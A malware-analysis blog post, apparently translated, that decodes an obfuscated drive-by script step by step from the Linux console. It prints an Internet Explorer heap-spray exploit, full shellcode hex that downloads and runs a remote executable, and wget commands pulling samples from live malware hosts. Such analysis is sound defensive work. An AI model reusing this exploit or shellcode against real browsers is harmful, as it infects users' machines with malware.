Analyzing Malicious Scripts from the Console! (2)

This time let's look at a malicious script of a slightly different shape.

[byjjoon@ByJJoon Script Analysis]$ wget http://61.100.7.171/css/lib.asp
--2010-05-09 19:33:23--  http://61.100.7.171/css/lib.asp
Connecting to 61.100.7.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5851 (5.7K) [text/html]
Saving to: `lib.asp'

100%[===============================================================================================================>] 5,851       --.-K/s   in 0.008s  

2010-05-09 19:33:23 (749 KB/s) - `lib.asp' saved [5851/5851]

[byjjoon@ByJJoon Script Analysis]$ cat lib.asp 

<SCRIPT LANGUAGE="JavaScript" defer>function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
j=j+String.fromCharCode(t);}}return j;}
var x=a("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");  
window.document.write(x);
window.location.reload();
</SCRIPT>

<script src="http://s33.cnzz.com/stat.php?id=2030218&web_id=2030218" language="JavaScript"></script>

It looks tangled, but it is actually very simple. Modify the script as shown below.

function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
j=j+String.fromCharCode(t);}}return j;}
var x=a("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");  
print(x);

Comparing the script before and after the modification:

[byjjoon@ByJJoon Script Analysis]$ diff lib.asp lib_modify.asp 
1,2c1
< 
< <SCRIPT LANGUAGE="JavaScript" defer>function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
---
> function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
5,9c4
< window.document.write(x);
< window.location.reload();
< </SCRIPT>
< 
< <script src="http://s33.cnzz.com/stat.php?id=2030218&web_id=2030218" language="JavaScript"></script>
\ No newline at end of file
---
> print(x);
[byjjoon@ByJJoon Script Analysis]$ 

Now let's run the script with SpiderMonkey and see what it produces.

[byjjoon@ByJJoon Script Analysis]$ js lib_modify.asp 
<button id='mon' onclick='sclick();' STYLE='DISPLAY:NONE'></button><script language="JavaScript" defer> function cjm(s){ var rstr,n; n=""; for (i=1;i<=s.length ;i++ ) { if ((i % 4)==0) { rstr = "%u"+s.substr(i-2,2)+s.substr(i-4,2); n= n + rstr; } } return unescape(n); } var lv = cjm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"); var Carr = new Array();var it = 0x86000 - lv.length*2;var wflag = "%u0c0c%u0c0c";var ks = unescape(wflag);while(ks.length < it/2) ks +=ks;var p = ks.substring(0, it/2);delete ks;for(i=0;i<270;i++){Carr[i] = p+p+lv;}function sclick(){var sBody = document.createElement("BODY");sBody.addBehavior("#default#userData");document.appendChild(sBody);try{for (i=0;i<10;i++){sBody.setAttribute('s',window);}}catch(e){}window.status+='';}document.getElementById("mon").onclick();</script>
[byjjoon@ByJJoon Script Analysis]$ 
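The decoded stage's cjm() turns its hex string into %uXXYY units before unescape(). As an added example (not code from the post), here is a Python equivalent showing that the bytes it lays out equal a plain unhexlify() of the same hex string, which is why the hex can later be fed straight to binascii.unhexlify; the sample hex is the first 16 digits of the dumped payload, and the assumption is that JScript strings sit in memory as UTF-16LE, as in 32-bit IE.

```python
import binascii

def cjm_to_bytes(s: str) -> bytes:
    """Python equivalent of cjm(): every 4 hex digits become one %uXXYY unit
    with the two digit pairs swapped, unescape() turns that into the UTF-16
    code unit 0xXXYY, and on a little-endian host the unit sits in memory as
    the bytes YY XX, i.e. in the original order of the hex string."""
    units = []
    for i in range(4, len(s) + 1, 4):          # same stride as the JS loop
        units.append(int(s[i - 2:i] + s[i - 4:i - 2], 16))
    # Assumption: JScript strings are UTF-16LE in memory (true for 32-bit IE).
    return b"".join(u.to_bytes(2, "little") for u in units)

def matches_unhexlify(hexstr: str) -> bool:
    """True when cjm()'s byte stream equals a plain unhexlify() of the string."""
    return cjm_to_bytes(hexstr) == binascii.unhexlify(hexstr)

# Constructed sample: the first 16 hex digits of the payload shown in the post
# (NOP sled, "XXXX", then a short jump), as at offset 0 of the xxd output.
SAMPLE_HEX = "9090909058585858EB105B4B33C966B9"

if __name__ == "__main__":
    print(cjm_to_bytes(SAMPLE_HEX).hex())   # 9090909058585858eb105b4b33c966b9
    print(matches_unhexlify(SAMPLE_HEX))    # True
```

Note that cjm() silently drops any trailing digits that do not fill a 4-digit unit, so an odd-length tail would differ from unhexlify().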

Printing the script reveals a value that looks like hex. Let's pull out just that part and save it as hex.dump.

[byjjoon@ByJJoon Script Analysis]$ python -c "import binascii; print binascii.unhexlify('9090909058585858EB105B4B33C966B9B80380340BBDE2FAEB05E8EBFFFFFF54A3BEBDBDE2D91C8DBDBDBD36FDB136CDA11036D5B5364AD7ACE45503BFBDBD2D5F45D58E8FBDBDD5E8CED8CFE936FBB15503BCBDBD3655D7B8E45523BFBDBD5F44D5D2D3BDBDD5C8CFD1D0E942AB387DC8AED5D2D3BDBDD5C8CFD1D0E936FBB15533BCBDBD3655D7BCE455D3BFBDBD5F44D5D18E8FBDD5CED5D8D1E936FBB155D2BCBDBD3655D7BCE455F2BFBDBD5F443C51BDBCBDBD36613C7E3DBDBDBDD7BDD7A7EED7BD42EBE18E7DFD3D81BEBDC8447AB9BEE1DE93D87AF9BEB9C5D8BDBD8E74ECECEEEAEC8E7D36FBE5559FBCBDBD3E45BD541EBDBDBD2DD7BDD7BDD7BED7BDD7BFD5BDBDBD7DEE36FB9955BCBCBDBD34FBDDD7BDED42EB9534FBD936FBDDD7BDD7BDD7BDD7B9D7BDED42EB91D7BDD7BDD7BDD5A2BDB2BDED42EB8134FBC536F3D93DC1B54209C9B13DC1B542BDC9B83DC9B542095F56343B3DBDBDBD7AFBCDBDBDBDBD7AFBC9BDBDBDBDD7BDD7BDD7BD36FBDDED42EB85363B3DBDBDBDD7BD30F3C9EC42CBCDED42CBDD42EB8D42CBDD42EB8942CBC542EBFD36468E7D8E663C51BDBFBDBD36713E45E9C0B534A1BC3E7DB9564E367136643E7EAD8E7DEDECEEEDEDEDEDEDEDEAEDED42EBB536C3E955ADBCBDBD55D8BDBDBDD5DECBCABDD5CED5D9D2E936FBB15599BDBDBD34FB81D91CB9BDBDBD301DDD424242D7D842CB8136FBAD55B5BDBDBD8E66EEEEEEEE426D3D85553D8554C8AC3CC5B82D2D2D2DC9B53642E8365130FDB8425D551BBDBDBD7E551DBDBDBD05ACBCB93D7FB1BD552EBDBDBD3C51BDBCBDBD36413E7AB97ABA8FC92CB17AFAB9DE346CF27AFAB51DD82A767AFAB1ECFD07C27AFAAD83A00B847AFAA905D469A67AFAA503C2DB1D7AFAA141148A107AFA9D25B7AD45D91C8DBDBDBD36FDB136CDA11036D5B5364AD7B9E455E9BDBDBD2D5F45D58E8FBDBDD5E8CED8CFE936BB55E84242423655D7B8E45588BDBDBD5F448E42EA42EBB956BFE57E5544424242E67BBA0534E2BCDB7AFAB8425D7EEE3661EED7FDD5BDADBDBDEA36FB9D55A5424242E57EECEB36C88136C993C5BE48EB36CB9DBE488E74F4FC10BE788E66B203AD876BC9B57C76BABE67FD564C86A2C85AE336E399BE60DB36B1F636E3A1BE6036B936BE7816E3E47E55604142420F4F5F49845FC03E67F5C6808FC92CB138621206DE346CF2ECFD07C21DD82A76A319D9522E8F592933AEB7117FA4F6BC7930A2C9EADBB042FE031166C04D1827EF431A6783A00B8405D469A603C2DB1D41148A1025B7AD453D6B122746EEA8dbD5C9C9CD8792928B8C938C8D8D938C93848E92DECECE92D4CEDC93D8C5D8BDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDEAEA')" > hex.dump
[byjjoon@ByJJoon Script Analysis]$ xxd hex.dump 
0000000: 9090 9090 5858 5858 eb10 5b4b 33c9 66b9  ....XXXX..[K3.f.
0000010: b803 8034 0bbd e2fa eb05 e8eb ffff ff54  ...4...........T
0000020: a3be bdbd e2d9 1c8d bdbd bd36 fdb1 36cd  ...........6..6.
0000030: a110 36d5 b536 4ad7 ace4 5503 bfbd bd2d  ..6..6J...U....-
0000040: 5f45 d58e 8fbd bdd5 e8ce d8cf e936 fbb1  _E...........6..
0000050: 5503 bcbd bd36 55d7 b8e4 5523 bfbd bd5f  U....6U...U#..._
0000060: 44d5 d2d3 bdbd d5c8 cfd1 d0e9 42ab 387d  D...........B.8}
0000070: c8ae d5d2 d3bd bdd5 c8cf d1d0 e936 fbb1  .............6..
0000080: 5533 bcbd bd36 55d7 bce4 55d3 bfbd bd5f  U3...6U...U...._
0000090: 44d5 d18e 8fbd d5ce d5d8 d1e9 36fb b155  D...........6..U
00000a0: d2bc bdbd 3655 d7bc e455 f2bf bdbd 5f44  ....6U...U...._D
00000b0: 3c51 bdbc bdbd 3661 3c7e 3dbd bdbd d7bd  <Q....6a<~=.....
00000c0: d7a7 eed7 bd42 ebe1 8e7d fd3d 81be bdc8  .....B...}.=....
00000d0: 447a b9be e1de 93d8 7af9 beb9 c5d8 bdbd  Dz......z.......
00000e0: 8e74 ecec eeea ec8e 7d36 fbe5 559f bcbd  .t......}6..U...
00000f0: bd3e 45bd 541e bdbd bd2d d7bd d7bd d7be  .>E.T....-......
0000100: d7bd d7bf d5bd bdbd 7dee 36fb 9955 bcbc  ........}.6..U..
0000110: bdbd 34fb ddd7 bded 42eb 9534 fbd9 36fb  ..4.....B..4..6.
0000120: ddd7 bdd7 bdd7 bdd7 b9d7 bded 42eb 91d7  ............B...
0000130: bdd7 bdd7 bdd5 a2bd b2bd ed42 eb81 34fb  ...........B..4.
0000140: c536 f3d9 3dc1 b542 09c9 b13d c1b5 42bd  .6..=..B...=..B.
0000150: c9b8 3dc9 b542 095f 5634 3b3d bdbd bd7a  ..=..B._V4;=...z
0000160: fbcd bdbd bdbd 7afb c9bd bdbd bdd7 bdd7  ......z.........
0000170: bdd7 bd36 fbdd ed42 eb85 363b 3dbd bdbd  ...6...B..6;=...
0000180: d7bd 30f3 c9ec 42cb cded 42cb dd42 eb8d  ..0...B...B..B..
0000190: 42cb dd42 eb89 42cb c542 ebfd 3646 8e7d  B..B..B..B..6F.}
00001a0: 8e66 3c51 bdbf bdbd 3671 3e45 e9c0 b534  .f<Q....6q>E...4
00001b0: a1bc 3e7d b956 4e36 7136 643e 7ead 8e7d  ..>}.VN6q6d>~..}
00001c0: edec eeed eded eded edea eded 42eb b536  ............B..6
00001d0: c3e9 55ad bcbd bd55 d8bd bdbd d5de cbca  ..U....U........
00001e0: bdd5 ced5 d9d2 e936 fbb1 5599 bdbd bd34  .......6..U....4
00001f0: fb81 d91c b9bd bdbd 301d dd42 4242 d7d8  ........0..BBB..
0000200: 42cb 8136 fbad 55b5 bdbd bd8e 66ee eeee  B..6..U.....f...
0000210: ee42 6d3d 8555 3d85 54c8 ac3c c5b8 2d2d  .Bm=.U=.T..<..--
0000220: 2d2d c9b5 3642 e836 5130 fdb8 425d 551b  --..6B.6Q0..B]U.
0000230: bdbd bd7e 551d bdbd bd05 acbc b93d 7fb1  ...~U........=..
0000240: bd55 2ebd bdbd 3c51 bdbc bdbd 3641 3e7a  .U....<Q....6A>z
0000250: b97a ba8f c92c b17a fab9 de34 6cf2 7afa  .z...,.z...4l.z.
0000260: b51d d82a 767a fab1 ecfd 07c2 7afa ad83  ...*vz......z...
0000270: a00b 847a faa9 05d4 69a6 7afa a503 c2db  ...z....i.z.....
0000280: 1d7a faa1 4114 8a10 7afa 9d25 b7ad 45d9  .z..A...z..%..E.
0000290: 1c8d bdbd bd36 fdb1 36cd a110 36d5 b536  .....6..6...6..6
00002a0: 4ad7 b9e4 55e9 bdbd bd2d 5f45 d58e 8fbd  J...U....-_E....
00002b0: bdd5 e8ce d8cf e936 bb55 e842 4242 3655  .......6.U.BBB6U
00002c0: d7b8 e455 88bd bdbd 5f44 8e42 ea42 ebb9  ...U...._D.B.B..
00002d0: 56bf e57e 5544 4242 42e6 7bba 0534 e2bc  V..~UDBBB.{..4..
00002e0: db7a fab8 425d 7eee 3661 eed7 fdd5 bdad  .z..B]~.6a......
00002f0: bdbd ea36 fb9d 55a5 4242 42e5 7eec eb36  ...6..U.BBB.~..6
0000300: c881 36c9 93c5 be48 eb36 cb9d be48 8e74  ..6....H.6...H.t
0000310: f4fc 10be 788e 66b2 03ad 876b c9b5 7c76  ....x.f....k..|v
0000320: babe 67fd 564c 86a2 c85a e336 e399 be60  ..g.VL...Z.6...`
0000330: db36 b1f6 36e3 a1be 6036 b936 be78 16e3  .6..6...`6.6.x..
0000340: e47e 5560 4142 420f 4f5f 4984 5fc0 3e67  .~U`ABB.O_I._.>g
0000350: f5c6 808f c92c b138 6212 06de 346c f2ec  .....,.8b...4l..
0000360: fd07 c21d d82a 76a3 19d9 522e 8f59 2933  .....*v...R..Y)3
0000370: aeb7 117f a4f6 bc79 30a2 c9ea dbb0 42fe  .......y0.....B.
0000380: 0311 66c0 4d18 27ef 431a 6783 a00b 8405  ..f.M.'.C.g.....
0000390: d469 a603 c2db 1d41 148a 1025 b7ad 453d  .i.....A...%..E=
00003a0: 6b12 2746 eea8 dbd5 c9c9 cd87 9292 8b8c  k.'F............
00003b0: 938c 8d8d 938c 9384 8e92 dece ce92 d4ce  ................
00003c0: dc93 d8c5 d8bd bdbd bdbd bdbd bdbd bdbd  ................
00003d0: bdbd bdbd bdbd bdbd eaea 0a              ...........

Now let's run the saved bytes through the XOR key search script introduced in the previous post and look for the download URL.

[byjjoon@ByJJoon Script Analysis]$ ./xor_search.py hex.dump http
[+] Start
[+] Find key : 0xbd
[+] Apply XOR : http://61.100.1.93/css/isa.exe
[+] End
[byjjoon@ByJJoon Script Analysis]$ 
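The post's xor_search.py lives in the previous entry and is not reproduced here; what follows is an added example of the same idea, written for this page and not the author's code: try every single-byte key, keep those under which a known plaintext ("http") appears, and read out the NUL-terminated string that follows. The input is a constructed buffer that mimics the dump's layout (padding, then the URL from the post XORed with 0xbd), not the real hex.dump.

```python
def xor_bytes(buf: bytes, key: int) -> bytes:
    """XOR every byte of buf with a single-byte key."""
    return bytes(b ^ key for b in buf)

def find_xor_keys(buf: bytes, needle: bytes) -> list:
    """Return every single-byte key under which `needle` shows up in the decoded buffer."""
    return [key for key in range(256) if needle in xor_bytes(buf, key)]

def extract_strings(buf: bytes, needle: bytes, key: int) -> list:
    """Decode buf with key and return each needle-prefixed, NUL-terminated string.
    A NUL XORed with 0xbd is 0xbd, so the padding after a string encoded this
    way shows up as a run of bd bytes, like the runs seen in the xxd output."""
    plain = xor_bytes(buf, key)
    found = []
    start = plain.find(needle)
    while start != -1:
        end = plain.find(b"\x00", start)
        if end == -1:
            end = len(plain)
        found.append(plain[start:end].decode("latin-1"))
        start = plain.find(needle, end)
    return found

# Constructed sample (not the real hex.dump): NOP sled and "XXXX" in the clear,
# then the URL from the post XOR-encoded with 0xbd and NUL-terminated.
URL = b"http://61.100.1.93/css/isa.exe"
SAMPLE = b"\x90\x90\x90\x90XXXX" + xor_bytes(URL + b"\x00", 0xbd) + b"\xea\xea"

if __name__ == "__main__":
    print("[+] Start")
    for key in find_xor_keys(SAMPLE, b"http"):
        print("[+] Find key : 0x%02x" % key)
        for s in extract_strings(SAMPLE, b"http", key):
            print("[+] Apply XOR : " + s)
    print("[+] End")
```

To run it on the real dump, read hex.dump with open(..., "rb") and pass its contents in place of SAMPLE.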

There is the address. Let's download the file and take a look.

[byjjoon@ByJJoon Script Analysis]$ wget http://61.100.1.93/css/isa.exe
--2010-05-09 19:49:08--  http://61.100.1.93/css/isa.exe
Connecting to 61.100.1.93:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53248 (52K) [application/octet-stream]
Saving to: `isa.exe'

100%[===============================================================================================================>] 53,248      --.-K/s   in 0.07s   

2010-05-09 19:49:08 (715 KB/s) - `isa.exe' saved [53248/53248]

[byjjoon@ByJJoon Script Analysis]$ file isa.exe 
isa.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
[byjjoon@ByJJoon Script Analysis]$ 

This concludes the posts on analyzing malicious scripts from the console. Using Malzilla or other tools is far more convenient, but I expect this post will be useful to someone someday.

  • EOF -
